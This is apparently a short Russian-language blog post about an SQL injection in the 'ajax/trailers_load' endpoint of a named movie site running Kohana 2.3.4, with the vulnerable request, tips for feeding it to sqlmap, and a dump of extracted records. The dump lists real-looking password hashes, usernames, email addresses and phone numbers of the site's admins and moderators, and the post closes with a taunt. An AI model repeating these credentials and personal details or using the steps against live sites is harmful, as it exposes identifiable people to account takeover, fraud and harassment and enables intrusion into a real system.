security, безопасность, уязвимость, xss, sql-inj
Ajax-запросы конечно изменили интернет и обычно не видны, но проверять их все-таки стоит.
И все бы было хорошо, если бы при POST-запросе на ajax/trailers_load фильтровали лучше. А так мы видим сообщение от Kohana v2.3.4. что «При обработке запроса произошла ошибка в базе данных». Можно запускать sqlmap и смотреть внутренности. Но sqlmap не может в коммандной строке понять запрос
ignored={"trailers.modified <=1":1438290000}&offset=45&limit=15
из-за кавычек, поэтому их надо заменить на %22. Или брать запрос из файла.
select id,password,username,email,phone from users where acl_role_id=4 [4]: [*] 7, fe4cf2f5126849380b792ba0cf1cd6ce0c050103f7c1fb806d, moderator, kinoafisha@ukr.net, +380956445707 [*] 8, 04e8e164c73b8319eb680139716083fc3df050be6d8d6b0124, moderator2, tsuganokanna@ukr.net, +380673003302 [*] 9, 5241bf9ae1ec12272a14335ce8f8210147b8fb7f74b6aed09e, moderatornews, al-ya@ukr.net, +380674195529 [*] 53600, a00f086196c2700641c1859e1b8a11f6349a9b3b2538f00f8a, kopiraiter, helen_de@ukr.net, +380679708826select id,password,username,email,phone from users where acl_role_id=3 [7]: [*] 1, 10fac025669b96f4f5a64a679f6f77c95c099a50487f3c52bc, admin, maxim@altsolution.net, +380677789451 [*] 3, d03611f5a4d62d342f05b8f4e4a635a6047557a71a6864fd81, maxim, office@altsolution.net, +380506159818 [*] 5, 6bb383f18d1634a324de92526970e7b80c35ea988c62f23dc6, den, den@altsolution.net, [*] 46538, 5a455bd83bf267d549488f1922c9e0d1f8b128b3af32a58ef2, uakubik, uakubik@altsolution.net, +380953546549 [*] 53652, 2aa5bd4c8f5c50049db91c738ae28cba4e087ad0b7d536e413, Dima, gerasymov@altsolution.net, +380982707685 [*] 60683, 81df112dbdf34077f5ee2557784dc787df6bd0de88b4951be5, alex, alex@altsolution.net, +380662254609 [*] 71445, 329094b2ac852594322cb04ecb7a63d12acc59aa0dcb75eb0f, tanya, tanya@altsolution.net, +380500267244
Your security is bad and you should feel bad! 
Недавние комментарии